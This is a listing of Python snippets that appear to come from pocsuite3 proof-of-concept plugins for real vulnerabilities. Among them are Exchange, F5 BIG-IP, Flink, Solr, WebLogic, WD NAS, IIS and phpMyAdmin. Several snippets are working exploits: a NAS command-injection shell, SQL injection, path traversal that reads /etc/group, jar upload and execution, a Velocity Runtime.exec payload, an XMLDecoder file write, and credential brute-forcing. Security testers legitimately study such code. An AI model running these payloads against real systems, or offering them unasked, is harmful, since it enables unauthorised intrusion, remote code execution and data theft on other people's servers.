pocsuite3.api.requests.get



3 Source : bt_unauth_access_phpmyadmin.py
with GNU General Public License v3.0
from 78778443

    def exploit(self, mode):
        """Probe the BT-panel phpMyAdmin path on the fixed port 888.

        ``mode`` is accepted for interface compatibility but is not used.
        The port in ``self.url`` is ignored; only scheme and hostname are
        reused.  Returns a dict with ``VerifyInfo.URL`` when the page
        answers 200 and its body contains ``phpmyadmin``; an empty dict
        otherwise.  Request errors are not caught here and propagate.
        """
        parsed = urlparse(self.url)
        # Port is hard-coded: the panel's phpMyAdmin lives on 888 regardless
        # of the port the target URL was given with.
        probe_url = "{}://{}:{}/pma/".format(parsed.scheme, parsed.hostname, 888)
        response = requests.get(probe_url, timeout=5)

        findings = {}
        if response.status_code == 200 and "phpmyadmin" in response.text:
            findings['VerifyInfo'] = {'URL': probe_url}
        return findings

    def _verify(self):

3 Source : check_http_status.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Report the target when it answers anything other than HTTP 404.

        TLS verification is disabled (``verify=False``), so the response is
        not authenticated; this is a reachability probe only.  The status
        code is recorded as ``PoC``.  Any exception is logged and yields an
        empty result.
        """
        findings = {}
        target = self.url
        try:
            response = requests.get(target, verify=False, timeout=5)
            if response.status_code != 404:
                findings['VerifyInfo'] = {
                    'URL': target,
                    'PoC': str(response.status_code),
                }
        except Exception as exc:
            logger.error(str(exc))
        return self.parse_output(findings)

    def _attack(self):

3 Source : CVE-2021-21972.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Fingerprint vCenter and check the vropspluginui upload endpoint (CVE-2021-21972).

        The target is reported when the root page references
        ``/vsphere-client`` and a GET to the upload endpoint answers 405
        (the endpoint exists and rejects the method).  Read-only; nothing
        is uploaded.  No timeout is set on either request.  Exceptions are
        logged and yield an empty result.
        """
        findings = {}
        try:
            upload_endpoint = urljoin(
                self.url, "/ui/vropspluginui/rest/services/uploadova")
            root_page = requests.get(self.url)
            upload_page = requests.get(upload_endpoint)
            is_candidate = ('/vsphere-client' in root_page.text
                            and upload_page.status_code == 405)
            if is_candidate:
                findings['VerifyInfo'] = {'URL': self.url}
        except Exception as exc:
            logger.error(exc)

        return self.parse_output(findings)

    def _attack(self):

3 Source : CVE-2021-26855.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Check for the CVE-2021-26855 indicator on ``/owa/auth/x.js``.

        Sends the backend-routing cookies from the public PoC and treats a
        500 response whose body contains ``NegotiateSecurityContext`` as
        the indicator.  The URL reported is ``self.url``, not the probe
        path.  Exceptions are logged and yield an empty result.
        """
        findings = {}
        try:
            probe_url = urljoin(self.url, "/owa/auth/x.js")
            probe_headers = {
                'Cookie': 'X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;'
            }
            response = requests.get(probe_url, headers=probe_headers, timeout=10)
            indicator_seen = (response.status_code == 500
                              and 'NegotiateSecurityContext' in response.text)
            if indicator_seen:
                findings['VerifyInfo'] = {'URL': self.url}
        except Exception as exc:
            logger.error(exc)

        return self.parse_output(findings)

    def _attack(self):

3 Source : fofacms.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Fingerprint the CMS from the target's home-page body.

        ``self.fingerprint`` (defined elsewhere in the class) is expected to
        return a non-empty string when it recognises the page; the result
        then carries ``URL`` and ``Info``.  No timeout is set.  Exceptions
        are logged and yield an empty result.
        """
        findings = {}
        target_url = self.url

        try:
            body = requests.get(target_url).text
            cms_name = self.fingerprint(body)
            if cms_name != "":
                findings['VerifyInfo'] = {
                    'URL': target_url,
                    'Info': cms_name,
                }
        except Exception as exc:
            logger.error(str(exc))
        return self.parse_output(findings)

    def parse_output(self, result):

3 Source : node_red_unauthorized_rce.py
with GNU General Public License v3.0
from 78778443

def need_auth(url):
    """Return 1 when ``url``/settings answers HTTP 401 (auth required), else 0.

    No timeout is set and request errors propagate to the caller.
    """
    settings_response = requests.get("{}/settings".format(url))
    return 1 if settings_response.status_code == 401 else 0


def login(url, username="admin", password="password"):

3 Source : phpmyadmin_burst.py
with GNU General Public License v3.0
from 78778443

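    def pma_login(self, url, username, password):
        """Attempt a phpMyAdmin form login; True when a ``pmaAuth-1`` cookie comes back.

        Fetches the login page to read ``set_session`` and ``token``, posts
        the form with the page's cookies, and checks the response cookies.
        Up to two attempts are made.  Fix: the bare ``except`` is narrowed
        to ``except Exception`` so KeyboardInterrupt/SystemExit are no
        longer swallowed; request failures and a missing token/set_session
        field (``re.search`` returning None) still count as a failed
        attempt.  The GET has no timeout; only the POST is bounded (3 s).
        """
        session_field = r"name=\"set_session\" value=\"(.+?)\""
        token_field = r"name=\"token\" value=\"(.+?)\""
        for _attempt in range(2):
            try:
                page = requests.get(url)
                page_cookies = dict(page.cookies)
                form = {
                    'set_session': html.unescape(re.search(session_field, page.text, re.I).group(1)),
                    'token': html.unescape(re.search(token_field, page.text, re.I).group(1)),
                    'pma_username': username,
                    'pma_password': password,
                }
                login = requests.post(url, cookies=page_cookies, data=form, timeout=3)
                return 'pmaAuth-1' in dict(login.cookies)
            except Exception:
                # Retry once on any request error or missing form field,
                # then report failure.
                pass
        return False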

    def get_word_list(self):

3 Source : unauthorized-check.py
with GNU General Public License v3.0
from 78778443

    def elasticsearch(self, ip):
        """Check whether Elasticsearch on ``ip``:9200 serves ``/_cat`` without auth.

        Returns a descriptive string when ``/_cat/master`` appears in the
        body, False when it does not, and None when the request raises —
        callers must treat None and False alike.
        """
        try:
            endpoint = 'http://' + ip + ':9200/_cat'
            body = requests.get(endpoint, timeout=5).content.decode()
        except Exception:
            return None
        if '/_cat/master' in body:
            return ip + ":9200 elasticsearch未授权"
        return False

    def zookeeper(self, ip):

3 Source : unauthorized-check.py
with GNU General Public License v3.0
from 78778443

    def CouchDB(self, ip):
        """Check whether CouchDB on ``ip``:5984 exposes Fauxton (``/_utils/``) without auth.

        Returns a descriptive string when ``couchdb-logo`` appears in the
        body, False when it does not, and None when the request raises —
        callers must treat None and False alike.
        """
        try:
            endpoint = 'http://' + ip + ':5984' + '/_utils/'
            body = requests.get(endpoint, timeout=5).content.decode()
        except Exception:
            return None
        if 'couchdb-logo' in body:
            return ip + ":5984 CouchDB未授权"
        return False

    def docker(self, ip):

3 Source : unauthorized-check.py
with GNU General Public License v3.0
from 78778443

    def docker(self, ip):
        """Check whether the Docker API on ``ip``:2375 answers ``/version`` without auth.

        Returns a descriptive string when ``ApiVersion`` appears in the
        body, False when it does not, and None when the request raises —
        callers must treat None and False alike.
        """
        try:
            endpoint = 'http://' + ip + ':2375' + '/version'
            body = requests.get(endpoint, timeout=5).content.decode()
        except Exception:
            return None
        if 'ApiVersion' in body:
            return ip + ":2375 docker api未授权"
        return False

    def Hadoop(self, ip):

3 Source : unauthorized-check.py
with GNU General Public License v3.0
from 78778443

    def Hadoop(self, ip):
        """Check whether the Hadoop NameNode UI on ``ip``:50070 is served without auth.

        Returns a descriptive string when ``hadoop.css`` appears in the
        body of ``/dfshealth.html``, False when it does not, and None when
        the request raises — callers must treat None and False alike.
        """
        try:
            endpoint = 'http://' + ip + ':50070' + '/dfshealth.html'
            body = requests.get(endpoint, timeout=5).content.decode()
        except Exception:
            return None
        if 'hadoop.css' in body:
            return ip + ":50070 Hadoop未授权"
        return False

    def _attack(self):

3 Source : wd_nas_login_bypass_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Verify the WD NAS login bypass by sending a command through ``DsdkProxy.php``.

        Not a read-only check: the POST injects ``cmd`` (``cat /proc/cpuinfo``)
        and the target is reported when CPU-info keywords appear in the
        response.  Neither request has a timeout.  Errors are logged at
        warn level and yield an empty result, returned via
        ``self.parse_verify``.
        """
        result = {}

        # The GET is issued before the proxy POST; the listing does not
        # show why (presumably session setup) — confirm against the source.
        veri_url1 = urljoin(self.url, '/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1')
        veri_url2 = urljoin(self.url, '/web/dsdk/DsdkProxy.php')
        cmd = 'cat /proc/cpuinfo'
        # Command is spliced into the body between quote/semicolon delimiters.
        data = "';{};'".format(cmd)
        # No credentials are sent; the cookie alone asserts admin.
        headers = {'cookie': 'isAdmin=1;username=admin'}
        try:
            requests.get(veri_url1)
            resp = requests.post(veri_url2, data=data, headers=headers)
            if any(keyword in resp.text for keyword in ['Processor', 'BogoMIPS', 'Hardware', 'Revision']):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
        except Exception as e:
            # logger.warn is the deprecated alias of .warning on a stdlib Logger.
            logger.warn(str(e))
        return self.parse_verify(result)

    def _attack(self):

3 Source : wd_nas_login_bypass_rce.py
with GNU General Public License v3.0
from 78778443

    def _shell(self):
        """Send the ``command`` option to the target through ``DsdkProxy.php``.

        Same request pair as ``_verify`` but with the operator-supplied
        command and no result handling: the response is discarded, nothing
        is returned, and errors are only logged at warn level.  No timeout
        is set on either request.
        """
        veri_url1 = urljoin(self.url, '/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1')
        veri_url2 = urljoin(self.url, '/web/dsdk/DsdkProxy.php')
        cmd = self.get_option("command")
        # Command is spliced into the body between quote/semicolon delimiters.
        data = "';{};'".format(cmd)
        # No credentials are sent; the cookie alone asserts admin.
        headers = {'cookie': 'isAdmin=1;username=admin'}
        try:
            requests.get(veri_url1)
            requests.post(veri_url2, data=data, headers=headers)
        except Exception as e:
            # logger.warn is the deprecated alias of .warning on a stdlib Logger.
            logger.warn(str(e))

    def parse_verify(self, result):

3 Source : ShellShock_Bash_RCE.py
with GNU General Public License v3.0
from 78778443

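def get_url(url):
    """Return the final URL after redirects for ``url``; on request failure return ``url`` unchanged.

    Fix: the bare ``except`` is narrowed to ``except Exception`` so
    KeyboardInterrupt/SystemExit propagate instead of being reported as
    "no redirect".  No timeout is set on the request.
    """
    try:
        return requests.get(url).url
    except Exception:
        return url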


def fix_url(url):

3 Source : ShellShock_Bash_RCE.py
with GNU General Public License v3.0
from 78778443

def is_url_exist(url):
    """Return True only when ``url`` answers with HTTP 404.

    Despite the name, every other status — and any exception — yields
    False.  No timeout is set on the request.
    """
    try:
        status = requests.get(url).status_code
    except Exception:
        return False
    return status == 404


def isSameDomain(url1, url2):

3 Source : shiziyuCMS_sqli.py
with GNU General Public License v3.0
from 78778443

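    def _verify(self):
        """Error-based SQLi check: look for the XPATH error that leaks the database name.

        Issues one GET (TLS verification disabled, no timeout).  When the
        body contains ``XPATH syntax error`` the target is reported and the
        ``~``-delimited name is extracted into ``Database.DBname``.  Fix:
        both regex lookups are now guarded, so a body that contains the
        marker but not the expected ``XPATH syntax error: ...\\r\\n`` line
        no longer raises IndexError; such a target is still reported as
        ``VerifyInfo`` but without the ``Database`` entry.
        """
        result = {}
        payload = r"index.php?s=apigoods/get_goods_detail&id=1%20and%20updatexml(1,concat(0x7e,(database()),0x7e),1)"
        url = self.url + payload
        r = requests.get(url, verify=False)
        if "XPATH syntax error" in r.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
            error_lines = re.findall(r'XPATH syntax error: .*?\r\n', r.text)
            # The leaked name sits between the two 0x7e ('~') delimiters.
            leaked = re.findall(r'~.*?~', error_lines[0]) if error_lines else []
            if leaked:
                result['Database'] = {}
                result['Database']['DBname'] = leaked[0].strip('~')
        return self.parse_output(result)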
    
    def _attack(self):

0 Source : springboot_actuator_all_unauthorized.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Probe common Spring Boot Actuator and Swagger endpoints for unauthenticated access.

        Each prefix in ``dir_path`` is combined with each name in
        ``dir_file_list``; a 200 whose body parses as JSON counts as a hit.
        Once any prefix yields hits the remaining prefixes are skipped.
        The Swagger/API-docs names are then tried by status code alone.
        All request and JSON errors are swallowed by bare ``except``
        clauses.  Hits are joined into ``extra.evidence``; the return goes
        through ``self.parse_attack``, not ``parse_output``.  No timeout
        is set on any request.
        """
        result = {}
        # Candidate path prefixes and endpoint names:
        dir_path = ('', 'actuator', 'moniter')
        dir_file_list = ('mappings', 'metrics', 'beans', 'configprops', 'env')
        api_filie_list = ('swagger-ui.html', 'api-docs', 'v2/api-docs')
        result_verified_url = []
        # Probe Spring Boot Actuator endpoints
        for path in dir_path:
            for file_name in dir_file_list:
                url_list = []
                url_list.append(self.url)
                if not self.url.endswith('/'):
                    url_list.append('/')
                if path:
                    url_list.append(path + '/')
                url_list.append(file_name)
                url = ''.join(url_list)
                try:
                    r = req.get(url)
                    if r.status_code == 200:
                        try:
                            # A live actuator endpoint normally returns JSON
                            json.loads(r.text)
                            result_verified_url.append(
                                '{}/{}'.format(path, file_name))
                        except:
                            pass
                except:
                    pass
            # Usually only one web prefix is configured, so stop trying the
            # other prefixes once one yields hits
            if len(result_verified_url) > 0:
                break
        # Probe API docs / Swagger:
        for file_name in api_filie_list:
            if self.url.endswith('/'):
                url = self.url + file_name
            else:
                url = self.url + '/' + file_name
            try:
                r = req.get(url)
                if r.status_code == 200:
                    result_verified_url.append(file_name)
            except:
                pass

        if len(result_verified_url) > 0:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['extra'] = {}
            result['extra']['evidence'] = '\r\n'.join(result_verified_url)

        return self.parse_attack(result)

    def _attack(self):

0 Source : f5-CVE-2020-5902_all_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Check F5 BIG-IP TMUI for the CVE-2020-5902 path bypass.

        For the port in ``self.url`` (default 443) and both schemes: a 200
        from the bypass path to ``getTabSet.jsp`` marks the target as
        vulnerable; a second request then reads ``/etc/group`` through
        ``fileRead.jsp`` and, on 200, stores the body as evidence.
        ``VerifyInfo`` is set on the first 200 alone, before the read is
        confirmed.  TLS verification is disabled and no timeout is set.
        Every exception (bare ``except``) is swallowed, including a
        UnicodeDecodeError from the evidence decode.  Returned through
        ``self.parse_attack``.
        """
        result = {}
        pr = urlparse(self.url)
        if pr.port:
            ports = [pr.port]
        else:
            ports = [443]

        for port in ports:
            for schema in ['http','https']:
                try:
                    # check bypass
                    url_check =  '{}://{}:{}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=test5902'.format(schema,pr.hostname,port)
                    r_test = req.get(url_check,verify=False)
                    # check fileRead.jsp
                    if r_test.status_code == 200:
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, port)

                        url_read =  '{}://{}:{}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/group'.format(schema,pr.hostname,port)
                        r_read = req.get(url_read,verify = False)
                        if r_read.status_code == 200:
                            result['extra'] = {}
                            result['extra']['evidence'] = r_read.content.decode('utf-8').strip()
                        # Stop at the first scheme that answers; the outer
                        # port loop continues.
                        break
                except:
                    #raise
                    pass


        return self.parse_attack(result)

    def _attack(self):

0 Source : flink-CVE-2020-17518_1.11.2_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Verify Apache Flink CVE-2020-17518 by uploading and running a jar.

        Not a read-only check: for the target port (default 8081) it reads
        the JobManager config to learn the web-upload directory, uploads a
        jar (its bytes are elided from this listing), runs it with a
        ``touch`` against ``$FLINK_HOME/log/<random>.log``, and reports
        the target when that log file is then served.  The jar and log
        file are left on the target.  The 400 checks on upload and run are
        the expected responses here; ``continue`` skips the port otherwise.
        ``except: raise`` means any exception aborts verification instead
        of being suppressed.  TLS verification is disabled, no timeout is
        set, and the result goes through ``self.parse_attack``.
        """
        result = {}
        pr = urlparse(self.url)
        if pr.port:
            ports = [pr.port]
        else:
            ports = [8081]

        for port in ports:
            try:
                # Read the JobManager config to find the flink-web-<id> upload path
                url_check = '{}://{}:{}/jobmanager/config'.format(pr.scheme, pr.hostname, port)
                r_test = req.get(url_check, verify=False)
                if r_test.status_code == 200:
                    m = re.findall(b'/tmp/flink-web-(.+?)"',r_test.content)
                    if not m:
                        continue
                    # Upload the jar under the discovered path; payload bytes
                    # are removed from this listing.
                    random_jars = '{}.jar'.format(random.randint(10000,100000))
                    flink_upload_pathfile = '/tmp/flink-web-{}/flink-web-upload/{}'.format(m[0].decode('utf-8'),random_jars)
                    upload_files = {'jarfile': (flink_upload_pathfile, base64.b64decode('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'))}
                    url_upload = '{}://{}:{}/jars/upload'.format(pr.scheme, pr.hostname, port)
                    r_upload = req.post(url_upload,files=upload_files,verify=False)
                    if r_upload.status_code != 400:
                        continue
                    # Run the jar; a 400 here is the expected response
                    random_log = 'flink--standalonesession-0-{}.log'.format(random.randint(10000,100000))
                    url_exeucte = '{}://{}:{}/jars/{}/run?entry-class=Execute&program-args="touch $FLINK_HOME/log/{}"'.format(
                        pr.scheme, pr.hostname, port,random_jars,random_log)
                    r_execute = req.post(url_exeucte, verify=False)
                    # Check that the touched log file now exists:
                    if r_execute.status_code != 400:
                        continue
                    url_log_exist  = '{}://{}:{}/jobmanager/logs/{}'.format(pr.scheme, pr.hostname, port,random_log)
                    r_exist = req.get(url_log_exist, verify=False)
                    if r_exist.status_code == 200:
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['URL'] = '{}:{}'.format(
                            pr.hostname, port)
                        break
            except:
                # Debug leftover: re-raises rather than suppressing.
                raise
                #pass

        return self.parse_attack(result)

    def _attack(self):

0 Source : flink-CVE-2020-17519_1.11.2_fileread.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Check the Flink JobManager log endpoint for CVE-2020-17519 by reading ``/etc/group``.

        Uses the port in ``self.url`` or 8081.  A 200 whose body begins
        with ``root:x:0`` is reported, with the body as evidence.  TLS
        verification is disabled and no timeout is set.  Any exception
        (bare ``except``) is silently ignored.  Returned through
        ``self.parse_attack``.
        """
        result = {}
        parsed = urlparse(self.url)
        candidate_ports = [parsed.port] if parsed.port else [8081]

        for port in candidate_ports:
            try:
                probe_url = '{}://{}:{}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fgroup'.format(
                    parsed.scheme, parsed.hostname, port)
                response = req.get(probe_url, verify=False)
                looks_like_group_file = (response.status_code == 200
                                         and re.findall(b'^root:x:0', response.content))
                if looks_like_group_file:
                    result['VerifyInfo'] = {
                        'URL': '{}:{}'.format(parsed.hostname, port),
                    }
                    result['extra'] = {
                        'evidence': response.content.decode('utf-8').strip(),
                    }

            except:
                pass

        return self.parse_attack(result)

    def _attack(self):

0 Source : hikvision-2013-4976_web_login-bypass.py
with GNU General Public License v3.0
from 78778443

def check(uri):
    """Probe ``uri``/doc/page/main.asp with the CVE-2013-4976 anonymous ``userInfo80`` cookie.

    Returns ``(True, url)`` when the body contains both expected markers,
    ``(False, reason)`` otherwise.  NOTE(review): the marker
    ``b'  <  div id="mainFrame">'`` (spaces around ``<``) looks like an
    HTML-escaping artifact of this listing; verify it against the original
    source, since as written it is unlikely to match a real page.
    """
    request_headers = {
        'User-Agent': 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'}
    request_cookies = {'userInfo80': 'YW5vbnltb3VzOlwxNzdcMTc3XDE3N1wxNzdcMTc3XDE3Nw=='}
    main_page = '{}/doc/page/main.asp'.format(uri)
    try:
        response = req.get(main_page, headers=request_headers, cookies=request_cookies, timeout=5)
        body = response.content
        if b'playback.asp' in body and b'  <  div id="mainFrame">' in body:
            return True, main_page
        return False, 'No server page find'
    except req.exceptions.ConnectionError:
        return False, 'ConnectionError'
    except req.exceptions.ReadTimeout:
        return False, 'ReadTimeout'
    except Exception as exc:
        return False, str(exc)


class TestPOC(POCBase):

0 Source : iis-ms15-034_7_rce.py
with GNU General Public License v3.0
from 78778443

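    def _verify(self):
        """Check each candidate port for MS15-034 (HTTP.sys Range header handling).

        ``check`` first confirms the ``Server`` header names IIS/HTTP.sys
        and only then calls ``test_ms15_034``.  Fix: the original gate was
        ``if (tag in server for tag in Server_Tag):`` — a generator object,
        which is always truthy, so non-IIS servers were never filtered; it
        now uses ``any(...)``.  A missing ``Server`` header raises KeyError
        inside ``check`` and is reported as ``(False, <error>)`` as before.
        The outer bare ``except`` is narrowed to ``except Exception``.
        No timeout is set on either request.
        """
        def check(url):
            """Return ``test_ms15_034(url)`` when the server looks like IIS, else ``(False, reason)``."""
            server_tags = ['Microsoft-HTTP', 'Microsoft-IIS']
            try:
                probe = req.get(url)
                remote_server = probe.headers['server']
                if any(tag in remote_server for tag in server_tags):
                    return test_ms15_034(url)
                return (False, 'Web Service Is Not IIS\n[+] May Be ' + remote_server)
            except req.exceptions.ConnectTimeout:
                return (False, 'timeout')
            except Exception as e:
                return (False, '{}'.format(str(e)))

        def test_ms15_034(url):
            """Send the oversized Range request and classify the response body."""
            probe_headers = {'Host': 'stuff',
                             'Range': 'bytes=0-18446744073709551615'}
            response = req.get(url, headers=probe_headers)
            if b'Requested Range Not Satisfiable' in response.content:
                return (True, response.content)
            elif b'The request has an invalid header name' in response.content:
                return (False, 'The vulnerability has been fixed!')
            else:
                return (False, 'The IIS service was unable to display the vulnerability exists, the need for manual testing!')

        result = {}
        pr = urlparse(self.url)
        # Explicit port in the URL wins; otherwise plain HTTP on 80.
        ports = [pr.port] if pr.port else [80]
        for port in ports:
            try:
                url = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
                status, msg = check(url)
                if status:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = '{}:{}'.format(
                        pr.hostname, port)
                    break
            except Exception:
                pass

        return self.parse_output(result)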

    def _attack(self):

0 Source : iis-shortname_6_disclosure.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Check for the IIS short-name (8.3 tilde) enumeration behaviour.

        ``check`` requests a wildcard path that should resolve for any
        existing 8.3 name (``/*~1*/``) and one that should not
        (``/1ndex*~1*/``); a 404 for the first with a non-404 for the
        second is the tell.  GET is tried first, then OPTIONS.  Any
        exception inside ``check`` yields False.  No timeout is set.
        Adapted from lijiejie's IIS_shortname_Scanner
        (https://github.com/lijiejie/IIS_shortname_Scanner/blob/master/iis_shortname_Scan.py).
        """
        def status_pair_differs(fetch, existing_url, missing_url):
            # True when the "existing" wildcard is 404 but the "missing" one is not.
            existing_status = fetch(existing_url).status_code
            missing_status = fetch(missing_url).status_code
            return existing_status == 404 and missing_status != 404

        def check(url):
            existing_url = url + '/*~1*/index99.aspx'         # should match an existing 8.3 name
            missing_url = url + '/1ndex*~1*/index99.aspx'     # should match nothing
            try:
                for method in (req.get, req.options):
                    if status_pair_differs(method, existing_url, missing_url):
                        return True
                return False
            except Exception:
                return False

        result = {}
        parsed = urlparse(self.url)
        ports = [parsed.port] if parsed.port else [80]
        for port in ports:
            try:
                base_url = '{}://{}:{}'.format(parsed.scheme, parsed.hostname, port)
                if check(base_url):
                    result['VerifyInfo'] = {
                        'URL': '{}:{}'.format(parsed.hostname, port),
                    }
                    break
            except:
                pass

        return self.parse_output(result)

    def _attack(self):

0 Source : solr_8.3.1_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Verify the Solr VelocityResponseWriter RCE (Solr 8.3.1 PoC).

        Not a read-only check: for each candidate port (default 8983) it
        lists the cores, rewrites the first core's config to enable
        ``params.resource.loader.enabled``, then issues a Velocity template
        that runs ``echo`` and looks for the marker in the response.  The
        config change is not reverted.  There is no try/except: any request
        error, non-JSON body or missing ``status`` key propagates.  No
        timeout is set and TLS verification is left at its default.
        """
        result = {}

        pr = urlparse(self.url)
        if pr.port:
            ports = [pr.port]
        else:
            ports = [8983]
        for port in ports:
            target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
            # List the cores and take the first one
            target1 = target + "/solr/admin/cores?indexInfo=false&wt=json"
            headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:73.0) Gecko/20100101 Firefox/73.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
                       "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Referer": self.url, "Upgrade-Insecure-Requests": "1"}
            res1 = req.get(target1, headers=headers)
            core = json.loads(res1.content.decode())
            core2 = core['status'].keys()
            core3 = list(core2)[0]

            # Rewrite the core's config to enable params.resource.loader.enabled
            # (this change persists on the target)
            target2 = target + "/solr/" + core3 + "/config"
            post_json = {"update-queryresponsewriter": {"class": "solr.VelocityResponseWriter", "name": "velocity",
                                                        "params.resource.loader.enabled": "true", "solr.resource.loader.enabled": "true", "startup": "lazy", "template.base.dir": ""}}
            res2 = req.post(target2, headers=headers, json=post_json)

            # With the loader enabled, a GET carrying the Velocity template
            # runs the echo command; its marker is checked in the body
            target3 = target + "/solr/" + core3 + \
                "/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27echo%20d0xdeadbeaf%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
            response = req.get(target3, headers=headers)
            if response and response.status_code == 200 and "0xdeadbeaf" in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = '{}:{}'.format(
                    pr.hostname, port)
                break
        return self.parse_output(result)

    def _attack(self):

0 Source : weblogic-console-2020-14882_all_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Look for a WebLogic console reachable without authentication (CVE-2020-14882).

        For each candidate port (the URL's own, else 7001/17001/27001):
        ``check_console`` confirms ``/console/`` answers 200, then
        ``check_weblogic_console_page`` requests the double-encoded
        ``%252e%252e%252f`` console.portal path and treats a 302 followed
        by a 200 page containing ``id="HomePage1"`` as the indicator; the
        footer version, if matched, becomes the evidence.  Read-only.  TLS
        verification is disabled only in ``check_console``; the second
        check uses a fresh session with defaults and no timeout.
        """
        headers = {
            'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'}

        def check_console(target):
            """Return ``(True, body)`` when ``target``/console/ answers 200, else ``(False, reason)``."""
            if not target.startswith('http'):
                target = 'http://{}'.format(target)
            url = '{}/console/'.format(target)
            try:
                r = req.get(url, headers=headers, verify=False, timeout=5)
                if r.status_code == req.codes.ok:
                    # The console app may still be deploying; wait briefly.
                    if 'Deploying application for /console/...' in r.text:
                        time.sleep(2)
                    return (True, r.text.strip())
                elif r.status_code == 404:
                    return (False, '404')
                else:
                    return (False, r.status_code)
            except req.exceptions.ReadTimeout:
                return (False, 'timeout')
            except Exception as ex:
                # raise
                return (False, str(ex))

        def check_weblogic_console_page(target):
            """Return ``(True, version_or_empty)`` when the bypass path renders HomePage1, else ``(False, reason)``."""
            s = req.session()
            console_url = '/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=HomePage1'
            if not target.startswith('http'):
                target = 'http://{}'.format(target)
            url = '{}{}'.format(target, console_url)
            try:
                # first request only collects session cookies
                r = s.get(url, allow_redirects=False)
                # 302 to portal
                if r.status_code == 302:
                    r = s.get(url)
                    if r.status_code == 200 and 'id="HomePage1"' in r.text:
                        # NOTE(review): the "  <  p" / " < /p>" spacing looks
                        # like an HTML-escaping artifact of this listing;
                        # verify against the original source.
                        m = re.findall(
                            '  <  p id="footerVersion">(.*?) < /p>', r.text)
                        if m:
                            return (True, m[0])
                        else:
                            return(True, '')
                return (False, '')
            except req.exceptions.ReadTimeout:
                return (False, 'timeout')
            except Exception as ex:
                # raise
                return (False, str(ex))
        '''
        verify:
        '''
        result = {}
        pr = urlparse(self.url)
        if pr.port:  # and pr.port not in ports:
            ports = [pr.port]
        else:
            ports = [7001, 17001, 27001]
        for port in ports:
            uri = "{0}://{1}:{2}".format(pr.scheme, pr.hostname, str(port))
            status, msg = check_console(uri)
            if status:
                status, msg = check_weblogic_console_page(uri)
                if status:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = uri
                    result['extra'] = {}
                    result['extra']['evidence'] = msg
                    break

        return self.parse_output(result)

    def _attack(self):

0 Source : weblogic-wls-2017-10271_all_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """Verify the WebLogic WLS-WSAT XMLDecoder RCE (CVE-2017-10271).

        Not a read-only check: ``weblogic_rce`` posts an XMLDecoder payload
        that writes ``<flag>.txt`` (a random 8-letter flag) under the
        server's ``bea_wls_internal`` war directory; ``verify_result`` then
        fetches that file and reports success when the flag is echoed back.
        The file is not removed — a forensic artifact on the target.
        Candidate ports are the URL's own or 7001/17001/27001.  TLS
        verification is disabled on the POST; no timeout is set.
        NOTE(review): the ``  <  string>`` / `` < /string>`` spacing in the
        payload looks like an HTML-escaping artifact of this listing;
        verify against the original source.
        """
        flag = "".join(random.choice(string.ascii_letters)
                       for _ in range(0, 8))
        output_file = '{}.txt'.format(flag)
        # Payload formatting
        '''
        payload的格式化
        '''
        def payload_command():
            """Build the SOAP/XMLDecoder body that writes ``flag`` into ``output_file``."""
            command_filtered = "  <  string>{} < /string>".format(flag)
            payload_1 = '''
             < soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
             < soapenv:Header> < work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
             < java>
             < java version="1.6.0" class="java.beans.XMLDecoder">
             < object class="java.io.PrintWriter">
             < string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/{} < /string>
             < void method="println">{} < /void> < void method="close"/>
             < /object>
             < /java>
             < /java>
             < /work:WorkContext>
